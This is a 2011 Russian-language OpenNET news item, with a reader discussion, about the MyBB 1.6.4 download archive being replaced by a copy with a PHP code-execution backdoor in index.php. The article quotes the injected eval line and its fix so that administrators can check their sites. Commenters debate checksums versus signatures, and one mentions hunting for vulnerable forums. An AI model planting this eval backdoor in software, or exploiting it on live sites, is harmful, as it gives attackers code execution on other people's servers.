The OpenNET Project / Index page

[ новости /+++ | форум | wiki | теги | ]

В поставке открытого форума MyBB обнаружен вредоносный код

25.10.2011 17:49

В начале октября разработчики открытого форума MyBB опубликовали уведомление о наличии критической уязвимости в последней версии MyBB 1.6.4, выпущенной три месяца назад. Сегодня опубликованы подробности, указывающие на то, что уязвимость, позволяющая выполнить произвольный код PHP, была внесена злоумышленниками путем подмены архива с релизом форума на сервере загрузки.

По словам разработчиков, злоумышленники проникли в систему через неизвестную уязвимость в движке сайта, разработанном своими силами, но основанном на использовании сторонних открытых фреймворков. Разработчики считают, что проблема безопасности присутствует не в коде их CMS, который не распространяется публично, а в используемых внешних фреймворках. Подробности совершения взлома и время подмены архива неизвестны, поэтому разработчики рекомендуют срочно установить обновление для всех пользователей MyBB 1.6.4, загрузивших архив до 6 октября. Пользователям рекомендуется проверить файл index.php на наличие вредоносного кода и удалить директорию "install".

Уязвимы системы в файле index.php которых содержится строка:


   eval("\$loginform = \"".$templates->get("index_loginform")."\";".@$col[23]);

для блокирования вредоносного кода, данную строку следует заменить на:


   eval("\$loginform = \"".$templates->get("index_loginform")."\";");

С целью предотвращения подобных инцидентов в будущем, разработчики MyBB намерены начать распространение контрольных сумм для проверки целостности изначально опубликованных архивов. Контрольные суммы планируется распространять через сторонний сервер, чтобы исключить ситуацию, при которой злоумышленники могут подменить файлы с контрольными суммами. Второй вариант, который рассматривают разработчики MyBB - использование для организации загрузки релизов сетей доставки контента (CDN).

  1. Главная ссылка к новости (http://blog.mybb.com/2011/10/2...)
  2. OpenNews: На сайте MySQL.com обнаружен вредоносный JavaScript-код, распространяющий троянское ПО
  3. OpenNews: ФБР заподозрили в помещении бэкдора в IPSEC-стек OpenBSD
  4. OpenNews: Взлом сервера проекта ProFTPD привел ко внедрению бэкдора
  5. OpenNews: Продемонстрирована удачная попытка внедрения бэкдора в код интерпретатора PHP
  6. OpenNews: В доступный на официальном сайте архив исходных текстов FTP-сервера vsftpd был внедрен бэкдор
Лицензия: CC-BY
Тип: Проблемы безопасности
Ключевые слова: mybb, security
При перепечатке указание ссылки на opennet.ru обязательно
Обсуждение (52) Ajax | 1 уровень | Линейный | Раскрыть всё | RSS
  • 1.1, OramahMaalhur (ok), 18:56, 25/10/2011 [ответить] [﹢﹢﹢] [ · · · ]  
  • +8 +/
    Они используют eval? Извините, но закопать.
     
     
  • 2.34, pavlinux (ok), 05:52, 26/10/2011 [^] [^^] [^^^] [ответить]  
  • +5 +/
    Пользователям рекомендуется проверить сайт на наличие PHP.
    После обнаружения, сжечь, съесть, улететь в Чили, там нагадить
    и размазать по Андам.
     
     
  • 3.61, sh (??), 08:10, 31/10/2011 [^] [^^] [^^^] [ответить]  
  • +/
    Альтернатива?
     
     
  • 4.62, arisu (ok), 11:19, 31/10/2011 [^] [^^] [^^^] [ответить]  
  • +/
    > Альтернатива?

    чему?

     

  • 1.2, Аноним (-), 18:57, 25/10/2011 [ответить] [﹢﹢﹢] [ · · · ]  
  • +23 +/
    Шел 2011 год - разрабы MyBB взялись за контрольные суммы.
     
  • 1.3, Аноним (-), 19:23, 25/10/2011 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    Какие ещё контрольные суммы? man цифровая подпись.
     
     
  • 2.9, Аноним (-), 20:06, 25/10/2011 [^] [^^] [^^^] [ответить]  
  • –1 +/
    >man цифровая подпись.

    Аналог вроде md5sum -c ? Спасибо.

     
     
  • 3.10, Аноним (-), 20:09, 25/10/2011 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Аналог вроде md5sum -c ? Спасибо.

    Нет, цифровая подпись.

     
     
  • 4.11, Аноним (-), 20:13, 25/10/2011 [^] [^^] [^^^] [ответить]  
  • +2 +/
    >> Аналог вроде md5sum -c ? Спасибо.
    > Нет, цифровая подпись.

    Я о простоте использования.

     
     
  • 5.12, Аноним (-), 20:18, 25/10/2011 [^] [^^] [^^^] [ответить]  
  • +/
    Лучше сразу поясню.
    Алгоритм проверки контрольной суммы (хеша):
    1) качаем тарбол
    2) смотрим на оф. сайте, или чему мы там еще доверяем, хеш (или качаем текстовый файл с циферками)
    3) md5sum

    Хотелось бы узнать преимущества использования цифровой подписи, и алгоритм ручной проверки. С пакетными манагерами итак вся понятно и автоматизировано.

     
     
  • 6.18, dry (ok), 21:31, 25/10/2011 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Если действительно хочется узнать, а не просто потролить,
    то качаем Брюса Шнаера "Прикладная криптография".
    Глава 2. Основные элементы протоколов -> 2.6 Цифровые подписи.
     
     
  • 7.21, BratSinot (?), 23:02, 25/10/2011 [^] [^^] [^^^] [ответить]  
  • +/
    Если так, то уже проще md5sum запустить.
     
  • 7.25, Аноним (-), 00:18, 26/10/2011 [^] [^^] [^^^] [ответить]  
  • +/
    > Если действительно хочется узнать, а не просто потролить,
    > то качаем Брюса Шнаера "Прикладная криптография".
    > Глава 2. Основные элементы протоколов -> 2.6 Цифровые подписи.

    Вот вы развели тут фигню, а всего-то надо было ответить что-то вроде

    gpg --verify [[sigfile] [signed-files]]

    Эх, никакого живого общения.

    Профит по сравнению с md5sum при разовом применении отсутствует, ибо все равно нужно тянуть ключ. Некоторое удобство возникает лишь после импорта ключа. Ну про родные репы дистрибутива и не говорим - самое верное дело.

     
     
  • 8.26, eigrad (ok), 01:34, 26/10/2011 [^] [^^] [^^^] [ответить]  
  • +/
    Прочитал бы Шнаера Удобство тут не причем ... текст свёрнут, показать
     
     
  • 9.35, Какаянахренразница (?), 06:40, 26/10/2011 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Достали вы со своими шнайдерами Нет, чтобы внятно ответить человеку Цифровая п... текст свёрнут, показать
     
     
  • 10.37, Николайка (?), 09:28, 26/10/2011 [^] [^^] [^^^] [ответить]  
  • +/
    Агга, агга а недавний скандал про подделку сертификатов у третей стороны я... текст свёрнут, показать
     
     
  • 11.38, Аноним (-), 09:40, 26/10/2011 [^] [^^] [^^^] [ответить]  
  • +/
    Нельзя взломать только совесть Да и то, лишь у некоторых С ... текст свёрнут, показать
     
  • 11.39, Аноним (-), 10:55, 26/10/2011 [^] [^^] [^^^] [ответить]  
  • +/
    Поэтому для проверки и удостоверения оригинальности ключа, в отличии от сертифик... текст свёрнут, показать
     
     
  • 12.41, Аноним (-), 12:11, 26/10/2011 [^] [^^] [^^^] [ответить]  
  • +/
    Понятия Доверие и безопасность ортогональны Удивлен Компрометация одного у... текст свёрнут, показать
     
     
  • 13.51, Аноним (-), 23:09, 26/10/2011 [^] [^^] [^^^] [ответить]  
  • +/
    С чего бы это Вас кто-то заставляет верить только одному Доверяйте только тем ... текст свёрнут, показать
     
  • 10.47, Аноним (-), 15:00, 26/10/2011 [^] [^^] [^^^] [ответить]  
  • +/
    Подлинность ключа цифровой подписи не гарантируется ни кем И я не думаю, что ав... текст свёрнут, показать
     
     
  • 11.48, the joker (ok), 19:38, 26/10/2011 [^] [^^] [^^^] [ответить]  
  • +/
    Гарантируется Только вот верить третьей стороне или нет, каждый решает сам Ну... текст свёрнут, показать
     
     
  • 12.49, Аноним (-), 20:40, 26/10/2011 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Нед Подпись - лишь хеш, расшифрованный закрытым ключем Сертификат - это когда ... текст свёрнут, показать
     
     
  • 13.57, arisu (ok), 12:34, 30/10/2011 [^] [^^] [^^^] [ответить]  
  • +/
    поэтому не надо его там хранить, вот и всё а в принципе 8212 ничему не довер... текст свёрнут, показать
     
  • 10.56, arisu (ok), 12:32, 30/10/2011 [^] [^^] [^^^] [ответить]  
  • +/
    171 достали вы своей физикой нет, чтобы внятно ответить человеку, что трамвай... текст свёрнут, показать
     
  • 9.46, Аноним (-), 14:51, 26/10/2011 [^] [^^] [^^^] [ответить]  
  • +/
    Либо ты отвечаешь _тут_ и по сути вопроса, либо я засчитываю повторный слив пер... текст свёрнут, показать
     

  • 1.4, anonymous (??), 19:24, 25/10/2011 [ответить] [﹢﹢﹢] [ · · · ]  
  • +4 +/
    > С целью предотвращения подобных инцидентов в будущем, разработчики MyBB намерены начать распространение контрольных сумм

    Т.е. в использовании eval они подвоха так и не заподозрили. Удач.

     
  • 1.5, Аноним (-), 19:28, 25/10/2011 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    Про git они наверно не слышали...
     
     
  • 2.8, Аноним (-), 20:05, 25/10/2011 [^] [^^] [^^^] [ответить]  
  • +/
    Через git нельзя распространять тарболлы.
     
     
  • 3.17, Anonim (??), 21:04, 25/10/2011 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Через веб интерфейс спокойно можно скачать архив определенной версии.
     
     
  • 4.31, Аноним (-), 03:39, 26/10/2011 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > Через веб интерфейс спокойно можно скачать архив определенной версии.

    И с новой версией git'а или интерфейса у него будет изменится чексумма, ага.

     
  • 3.19, Andrey Mitrofanov (?), 21:32, 25/10/2011 [^] [^^] [^^^] [ответить]  
  • +/
    > Через git нельзя распространять тарболлы.

    А подписанные исходники -- можно. Па-ра-докс!!

     
     
  • 4.30, Аноним (-), 03:38, 26/10/2011 [^] [^^] [^^^] [ответить]  
  • +/
    Кому они нужны россыпью? Софт распространяется тарболлами.
     
     
  • 5.36, тигар (ok), 08:33, 26/10/2011 [^] [^^] [^^^] [ответить]  
  • +/
    > Кому они нужны россыпью? Софт распространяется тарболлами.

    у СпецЫалистаф софт распространяется deb'ами

     
     
  • 6.43, Аноним (-), 14:01, 26/10/2011 [^] [^^] [^^^] [ответить]  
  • +/
    > у СпецЫалистаф софт распространяется deb'ами

    deb'ы это одноразовый мусор. Весь source-based живёт на тарболах, потому что их можно сохранять локально, миррорить и, собственно, проверять их чексуммы.

     
     
  • 7.44, тигар (ok), 14:03, 26/10/2011 [^] [^^] [^^^] [ответить]  
  • +/
    >> у СпецЫалистаф софт распространяется deb'ами
    > deb'ы это одноразовый мусор. Весь source-based живёт на тарболах, потому что их
    > можно сохранять локально, миррорить и, собственно, проверять их чексуммы.

    спасибо за просветление, но я в курсе.

     
  • 7.50, Аноним (-), 20:43, 26/10/2011 [^] [^^] [^^^] [ответить]  
  • +/
    >Весь source-based живёт на тарболах, потому что их
    > можно сохранять локально, миррорить и, собственно, проверять их чексуммы.

    Итак:
    1) сохранять локально
    2) миррорить
    3) проверять чексумы

    Что из перечисленного нельзя делать с бинарными пакетами?

     
  • 7.58, arisu (ok), 12:36, 30/10/2011 [^] [^^] [^^^] [ответить]  
  • +/
    > Весь source-based живёт на тарболах, потому что

    …кульхацкеры-сборщики-из-исходников cannot into VCS.

     

  • 1.7, Аноним (-), 20:04, 25/10/2011 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    Все отлично, пару проектов взломают - тысяча других о безопасности подумает(а часть может и усилит защиту, а не только подумает).
     
  • 1.13, Аноним (-), 20:42, 25/10/2011 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    >С целью предотвращения подобных инцидентов в будущем, разработчики MyBB намерены начать распространение контрольных сумм для проверки целостности изначально опубликованных архивов.
    >Контрольные суммы планируется распространять через сторонний сервер, чтобы исключить ситуацию, при которой злоумышленники могут подменить файлы с контрольными суммами.
    >Второй вариант, который рассматривают разработчики MyBB - использование для организации загрузки релизов сетей доставки контента (CDN).

    Эти люди не слышали про OpenPGP/GnuPG? Срочно им расскажите, а то бедные опять костыли городят.

     
     
  • 2.22, Клыкастый (ok), 23:46, 25/10/2011 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Хромую лошадь можно не подковывать
     
  • 2.59, arisu (ok), 12:37, 30/10/2011 [^] [^^] [^^^] [ответить]  
  • +/
    > Эти люди не слышали про OpenPGP/GnuPG?

    тебе eval в коде ни на что не намекает?

     

  • 1.20, delin (?), 21:41, 25/10/2011 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    Больше похоже на преднамеренный "бекдор", чем на "они к нам залезли хз как, заменили хз как, и у нас нету инфы кто и когда", который был кем то спален.
     
  • 1.24, Anon21 (?), 00:10, 26/10/2011 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Потому что, блин, скачивать надо из Git'а.
     
     
  • 2.32, Аноним (-), 03:40, 26/10/2011 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Потому что, блин, скачивать надо из Git'а.

    Не надо скачивать из git'а. Да и нельзя.

     

  • 1.28, eigrad (ok), 03:08, 26/10/2011 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    блин... ни одного форума уязвимого найти не могу, мало слишком народу под раздачу попало %(
     
     
  • 2.29, eigrad (ok), 03:19, 26/10/2011 [^] [^^] [^^^] [ответить]  
  • +1 +/
    попадается много форумов с надписью "закрыто"... как будто их кто-то через этот бэкдор и позакрывал)
     
     
  • 3.33, eigrad (ok), 04:23, 26/10/2011 [^] [^^] [^^^] [ответить]  
  • +/
    а не, это просто я нуб. ТЫСЯЧИ ИХ
     

  • 1.45, DFX (ok), 14:37, 26/10/2011 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    >> Разработчики считают, что проблема безопасности присутствует не в коде их CMS, который не распространяется публично, а в используемых внешних фреймворках.

    ога, ога - "мы не знаем где дыра, но уж точно не у нас!".
    стоило бы всё таки сначала найти косяк и опубликовать, перед тем как воспевать security-trough-obscurity в своём закрытом коде и срать на "сторонние открытые фреймворки". как-то это лицемерненько выглядит от вроде как открытого проекта.

     
     
  • 2.60, arisu (ok), 12:38, 30/10/2011 [^] [^^] [^^^] [ответить]  
  • +/
    > ога, ога — «мы не знаем где дыра, но уж точно не у нас!».

    …"ведь мы умеем круто использовать eval!"

     

  • 1.52, Аноним (-), 23:11, 26/10/2011 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Я один не понял, на зачем вообще там eval?
     
  • 1.55, arisu (ok), 12:30, 30/10/2011 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    eval. уносите, пациент неоперабелен.
     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    Спонсоры:
    MIRhosting
    Inferno Solutions
    Hosting by Ihor
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2019 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру